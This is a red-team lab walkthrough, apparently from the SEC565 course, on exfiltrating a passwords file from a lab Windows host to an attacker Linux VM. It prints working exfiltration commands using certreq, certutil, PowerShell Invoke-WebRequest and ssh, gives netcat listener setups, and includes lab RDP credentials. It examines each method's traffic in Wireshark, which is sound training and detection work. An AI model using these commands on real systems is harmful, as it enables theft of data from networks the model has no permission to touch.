Lab 5.3: Action on Objectives
Objectives
- Exfiltrate data from the target network
- Examine how the data looks on the wire
- Make the best choices for operational security
In this lab we will identify and exfiltrate sensitive data from the target network. We will use a variety of techniques and evaluate each for their safety to our operations. Although our command-and-control frameworks have built-in file transfer capabilities, this lab will show a few manual techniques and demonstrate how the traffic looks as it traverses the network. Knowing what the signal looks like on the wire is important when making a risk decision on how to transfer data out of the target network.
TTPs Emulated in This Lab
Preparation
Preparation Steps
Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.
Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your IP address:
sudo openvpn ~/Desktop/sec565-labs-range.ovpn
Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :
ping -c 4 draconem.io
If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.
curl draconem.io | head

On Your Own
- RDP to the wk01 system:
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp - create a passwords file to exfiltrate in C:\Users\Gareth.Kilgallen\loot\passwords.txt
- Exfiltrate C:\Users\Gareth.Kilgallen\loot\passwords.txt to Slingshot with
certreq.exe - Exfiltrate C:\Users\Gareth.Kilgallen\loot\passwords.txt to Slingshot with
certreq.exeafter base64 encoding the data - Exfiltrate C:\Users\Gareth.Kilgallen\loot\passwords.txt to Slingshot with PowerShell and SecureString encryption
- Exfiltrate C:\Users\Gareth.Kilgallen\loot\passwords.txt to Slingshot with ssh
- Review the walkthrough
Walkthrough
Unsafe Data Exfiltration
1. First RDP to the wk01 machine.
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
mkdir C:\Users\Gareth.Kilgallen\loot
cd C:\Users\Gareth.Kilgallen\
echo love > loot\passwords.txt
echo sex >> loot\passwords.txt
echo secret >> loot\passwords.txt
echo god >> loot\passwords.txt
cls
2. On the Linux system, start Wireshark from the terminal with:
sudo wireshark &
We will receive data on our Linux VM and we will send it from the student Windows system.by clicking on the Applications menu > Internet -> Wireshark, listening on the tun0 adapter.

3. Start a listener on your Linux VM. You will need to take note of your IP address currently assigned for the next step.
nc -lvp 9001
4. We are ready to send our first payload. We will use a binary named certreq.exe or Certificate Request Processor. The binary is designed to request and manage certificates. Run the following command in your RDP session on the windows system. Replace the IP address shown below with the current IP address of the Slingshot Linux VM on the tun0 adapter.
cd C:\Users\Gareth.Kilgallen\loot
CertReq -Post -config http://10.254.252.3:9001/ passwords.txt

When that command ran, the executable reached out to the URL provided with an HTTP POST. The payload of that HTTP POST is the contents of the file provided passwords.txt. We can clearly see the plaintext context of the passwords.txt file in the netcat window.

5. Apply a filter of tcp.port == 9001 to Wireshark to filter the traffic down to the HTTP POST. Again we can see the contents of the file in plain text. This means that any network monitoring devices anywhere along the path can see that data.

Encoded Data Exfiltration
6. A naive option is to encode the data before transit. Note that we are using encoding, not encryption. On the Windows system, run the following command to base64 encoded the passwords.txt file. We are using another native Windows executable called certutil.exe or Certificate Utility.
certutil -encode passwords.txt passwords.b64

7. Restart the netcat listen on the Slingshot Linux VM but listening on port 9002.
nc -lvp 9002
8. We will use certreq.exe again, but we will change the port to 9002 and send the base64 encoded file passwords.b64.
CertReq -Post -config http://10.254.252.3:9002/ passwords.b64
9. We can now see that the plaintext data is a base64 encoded blob. Although this is obfuscating the data, it is trivial to identify and decode. In fact, most network monitoring solutions will decode base64 blobs for inspection.

10. Apply a filter of tcp.port == 9002 to Wireshark to filter the traffic down to the HTTP POST. We can easily spot the base64 encoded payload.

11. Copy the base64 blob from the terminal screen with the netcat listener and decode it with:
echo bG92ZQ0Kc2V4DQpzZWNyZXQNCmdvZA0K | base64 -d

Encrypted Data Exfiltration
12. Using PowerShell we will transfer the data with an HTTP POST after encrypting the data with a custom key. Start the netcat listener again, but this time on port 9003.
nc -lvp 9003
13. Next, open PowerShell in the command prompt on the Windows system and type the following commands. The commands first read in the file to transfer, create a PowerShell SecureString, and append each character in the file to that SecureString. Then a key is set—the length must be 128, 192, or 256 bits. The key is used to encrypt the data and store the data in the variable $ciphertext. Lastly, the data is send in an HTTP POST to our listener on port 9003
cd C:\Users\Gareth.Kilgallen\loot
$plaintext = Get-Content passwords.txt
$ss = New-Object System.Security.SecureString
foreach ($char in $plaintext.toCharArray()) { $ss.AppendChar($char) }
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("SEC565!!SEC565!!")
$ciphertext = ConvertFrom-SecureString -SecureString $ss -Key $key
Invoke-WebRequest -Uri http://10.254.252.3:9003/ -Method POST -Body $ciphertext

14. The netcat listener should have received a connection with a base64 blob of encrypted data. If you decode this base64 in the terminal, there will be unprintable characters. We need to use PowerShell to decrypt the data.

15. Apply a filter of tcp.port == 9003 to Wireshark to filter the traffic down to the HTTP POST. We can easily spot the base64 encoded payload.

16. Let's decrypt the payload using PowerShell on Slingshot Linux. In a terminal, run pwsh to start the PowerShell interactive terminal. Run the following commands to decrypt the payload.
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("SEC565!!SEC565!!")
$encrypted = "76492d1116743f0423413b16050a5345MgB8AGgAVQAxAEMAbwA3AEYAMgBtAE4ATwBwAGoAZQBiAHEAZQBDAFcAVABzAHcAPQA9AHwAZgBjADYAMwBiADAAMgA0ADAAMgBiAGMAMQA3AGYAYgBmAGUAOAA3AGIAMQBhADgAMAAwADcAYwBhAGUAMgAxAGMAOAA3ADIANQBmADQANwBjAGEAMABjADAANwBkADAAYwA0ADMANgA3AGIAMwA1AGUAYwBiADYAZAA4ADkAMgBhAGMAMgAxADYAMAAyAGYAMwAwADUAYQA4AGUANAA0ADYANABhADYANwA1ADgAOQBjAGUANQA4ADUAYwAzAGMA"
$ss = ConvertTo-SecureString -key $key -String $encrypted
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($ss)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
$result

SSH Data Exfiltration
17. Thank goodness for the Windows Subsystem for Linux! We have easy access to SSH from the command line and can exfil a file to our Linux VM by connecting to the SSH daemon. We can use scp or this handy trick with SSH on the Windows system. Make sure that the SSH daemon is running on Slingshot Linux first.
systemctl start ssh
Then on the windows target:
type passwords.txt | ssh sec565@10.254.252.3 "cat > passwords.txt"

On Slingshot Linux:
cd ~/
cat passwords.txt

18. We can examine this traffic in Wireshark and see that the data has been encrypted in transit. Use a filter like ssh or more specific ip.dst == 10.254.252.3 and tcp.dstport == 22

Conclusion
In this lab we exfiltrated a password file using a variety of techniques. We started with plaintext data transfer and saw that the plaintext stood out in a packet capture. Then we obfuscated the data before transmission. Although this was harder to easily see in the packet capture, it is trivial to decode. Then we used PowerShell's SecureString to encrypt the file contents with a key. Lastly, we used SSH to securely transfer data to our Slingshot Linux. These are just a few ways to exfiltrate data. Choose the safest methods available and always protect sensitive information.